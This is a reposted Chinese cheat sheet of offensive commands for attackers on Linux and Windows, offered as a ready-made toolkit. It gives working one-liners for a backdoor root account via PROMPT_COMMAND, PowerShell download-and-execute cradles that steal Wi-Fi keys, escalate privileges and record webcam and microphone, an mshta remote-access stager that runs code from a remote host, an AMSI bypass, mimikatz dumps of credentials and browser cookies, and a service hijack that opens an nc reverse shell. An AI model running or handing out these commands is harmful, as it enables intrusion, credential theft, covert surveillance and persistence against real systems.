Commands 搜集(持续更新)

Linux

Linux反弹shell后，方便的交互：

1	python -c 'import pty; pty.spawn("/bin/bash")'

无python时：

1	expect -c 'spawn bash;interact'

无wget nc等下载工具时下载文件

1	exec 5<>/dev/tcp/sec-lab.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

修改上传文件时间戳(掩盖入侵痕迹)

1	touch -r 老文件时间戳 新文件时间戳

利用BASH提权

这个要求管理员有su的习惯，我们可以通过它来添加一个id=0的用户
PROMPTCOMMAND利用这个变量保存了在主提示符 P R O M P T C O M M A N D 利 用 这 个 变 量 保 存 了 在 主 提 示 符 PS1显示之前需要执行的命令

导入:

1	export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

lsof 命令

1 2 3 4 5 6 7 8

lsof 1.txt 显示开启文件 abc.txt 的进程 lsof -i :22 知道 22 端口现在运行什么程序 lsof -c nsd 显示 nsd 进程现在打开的文件 lsof -g gid 显示归属 gid 的进程情况 lsof +d /usr/local/ 显示目录下被进程开启的文件 lsof +D /usr/local/ 同上，但是会搜索目录下的目录，时间较长 lsof -d 4 显示使用 fd 为4 的进程 lsof -i [i] 用以显示符合条件的进程情况

SSH端口转发
下面文章详细描述了3种方式转发
http://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html

图片马

1	Exiftool “-comment<=raj.php” 1.png

Windows

Powershell 相关

获取无线密码：

1	powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString ('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/ Get-WLAN-Keys.ps1');Get-Wlan-Keys "

提权加账号

1	powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString ('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/ Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/ c net user evi1cg test123 /add'"

下载执行：

1	powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile(' http://b.hiphotos.baidu.com/image/pic/item/d009b3de9c82d15825ffd75c840a19d8bd3e42da.jpg' ,'C:\\Users\Public\\test.jpg') & start C:\\Users\\Public\\test.jpg

摄像头录像：

1	powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString ('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1'); Capture-MiniEye -RecordTime 2 -Path $env:temp\hack.avi"

录音:

1	powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString ('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/ Get-MicrophoneAudio.ps1');Get-MicrophoneAudio -Path $env:TEMP\secret.wav -Length 10 -Alias 'SECRET'"

MSHTA

VBSCRIPT EXEC

1	mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

1	mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write() ;h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send(); b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run ("cmd /c taskkill /f /im mshta.exe",0,true);}

JSRAT

1

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject ("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false); try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell"). Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Bypass AMSI:

1	PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField ('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

use:

1	powershell.exe -ExecutionPolicy Bypass -noprofile [Ref].Assembly.GetType (''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'','' NonPublic,Static'').SetValue($null,$true);iex(New-Object Net.WebClient). DownloadString(''http://192.168.230.1/msfpayload.ps1'')

Bypass AV

1 2	sqlite3.exe -cmd "select load_extension('1.txt','EP')" sqlite3.exe -cmd "select load_extension('\\192.168.1.101\share\1.txt','EP')"

mimikatz

获取vpn密码

1	mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

读取chrome cookies

1 2 3

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1 \default\cookies /unprotect" exit mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1 \default\USERDA~1" exit mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1 \default\LOGIND~1" exit

提权常用

// What system are we connected to?

1	systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)

1 2	hostname echo %username%

// Get users

1 2	net users net user [username]

// Networking stuff

1	ipconfig /all

// Printer?

1	route print

// ARP-arific

1

arp -A

// Active network connections

1	netstat -ano

// Firewall fun (Win XP SP2+ only)

1 2	netsh firewall show state netsh firewall show config

// Scheduled tasks

1	schtasks /query /fo LIST /v

// Running processes to started services

1 2	tasklist /SVC net start

// Driver madness

1	DRIVERQUERY

// WMIC fun (Win 7/8 -- XP requires admin)

1

wmic /?

//Use wmic_info script!

// WMIC: check patch level

1	wmic qfe get Caption,Description,HotFixID,InstalledOn

// Search pathces for given patch

1	wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.."

// AlwaysInstallElevated fun

1 2	reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

// Other commands to run to hopefully get what we need

1 2 3 4

dir /s *pass* == *cred* == *vnc* == *.config* findstr /si password *.xml *.ini *.txt reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

// Service permissions

1 2	sc query sc qc [service_name]

// Accesschk stuff download link

1 2 3 4

accesschk.exe /accepteula (always do this first!!!!!) accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!) accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8) accesschk.exe -ucqv [service_name]

// Find all weak folder permissions per drive.

1 2	accesschk.exe -uwdqs Users c:\ accesschk.exe -uwdqs "Authenticated Users" c:\

// Find all weak file permissions per drive.

1 2	accesschk.exe -uwqs Users c:\*.* accesschk.exe -uwqs "Authenticated Users" c:\*.*

// Binary planting

1 2 3 4

sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe" sc config [service_name] obj= ".\LocalSystem" password= "" sc qc [service_name] (to verify!) net start [service_name]

CMD

1	%ProgramData:~0,1%%ProgramData:~9,2% /c echo

命令行下载

1	certutil -urlcache -split -f example.com/file

文章出处：Evi1cg's blog   

原文链接：https://evi1cg.me/archives/Commands.html

你可能喜欢

用Golang写的域名信息搜集工具

Kali Linux渗透基础知识整理（一）：信息搜集

信息搜集利用与惯性思维